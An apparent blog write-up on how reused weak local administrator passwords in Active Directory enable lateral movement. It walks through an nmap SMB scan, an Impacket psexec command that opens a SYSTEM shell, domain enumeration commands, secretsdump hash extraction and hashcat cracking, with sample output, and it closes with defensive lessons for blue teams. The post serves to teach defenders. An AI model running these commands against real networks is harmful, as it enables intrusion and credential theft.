π οΈ How a Weak Local Administrator Configuration in AD Can Lead to Lateral Movement
In many Active Directory (AD) environments, PCs are domain-joined by staff with limited cybersecurity training. This often leads to dangerous misconfigurations that attackers can exploit to gain a foothold and move laterally.
π Real-World Scenario
In a recent observation, I found an organization where PCs were added to the domain using the following steps:
-
A local admin account was created:
-
Username:
Administrator -
Password:
P@ssw0rd123(very weak and reused)
-
Username:
-
Using this Administrator account a normal user account was created for workstation use:
- Example:
Manager_HR
- Example:
The domain was joined from the normal user account.
π¨ What This Means
- Every PC has a predictable local admin account (
Administrator) with a weak, reused password. - SMB and file sharing are enabled on some machines.
- No use of LAPS or GPO to randomize local admin credentials.
This makes it trivial for an attacker to pivot across the network if one machine is compromised.
βοΈ Attacker Prerequisites
The attacker:
- Is on the same internal network (Kali machine or a rogue device)
- Can enumerate Windows hosts via SMB or ping sweeps
- Finds open SMB ports (445) on several machines
π₯ Attack Walkthrough
β 1. Nmap Scan from Attacker Machine
A simple scan using Nmap reveals multiple Windows hosts with port 445 open:
nmap -p 445 --open -T4 192.168.0.0/24
Result:
Host: 192.168.0.151
PORT STATE SERVICE
445/tcp open microsoft-ds
β 2. PsExec via Impacket from Kali
If the attacker knows the reused local admin credentials (Administrator:P@ssw0rd123), they can run:
python3 /usr/share/doc/python3-impacket/examples/psexec.py '.\Administrator:P@ssw0rd123@192.168.0.151'
Result:
[*] Found writable share ADMIN$
[*] Starting service...
C:\Windows\system32>
π Boom β SYSTEM shell on a domain-joined Windows 10 machine!
β 3. System & Domain Enumeration
Once in, the attacker can enumerate:
whoami /all
ipconfig /all
systeminfo
net config workstation
net user /domain
net group "Domain Admins" /domain
This gives the attacker:
- System privileges
- Domain name
- Domain controller info
- Active user accounts and groups
β
4. Dumping Hashes with secretsdump.py
From Kali, the attacker runs:
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py 'Administrator:P@ssw0rd123@192.168.0.151'
Result:
[*] Dumping local SAM hashes
User1:1000:aad3...:6597d9fe8469e21d840e2cbff8d43c8b:::
...
[*] Dumping LSA Secrets
[*] Dumping cached domain logon information
β 5. Cracking Passwords with Hashcat
The NTLM hash 6597d9fe8469e21d840e2cbff8d43c8b is cracked using:
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt --force
Result:
6597d9fe8469e21d840e2cbff8d43c8b:Test@1234
π You now have plaintext credentials of a local user. If reused, you can pivot to other machines or escalate to domain admin with additional paths.
π Lesson for Blue Teams
- Never reuse local admin passwords β deploy LAPS.
- Enforce complex passwords and disable the SID-500 account.
- Block SMB admin shares over the network if not required.
- Monitor for psexec-style behavior and lateral movement.
π§ Final Thought
One bad configuration β like a reused local admin password β can unravel your entire domain. Start with the basics. Secure the endpoints, then build upward.
Top comments (0)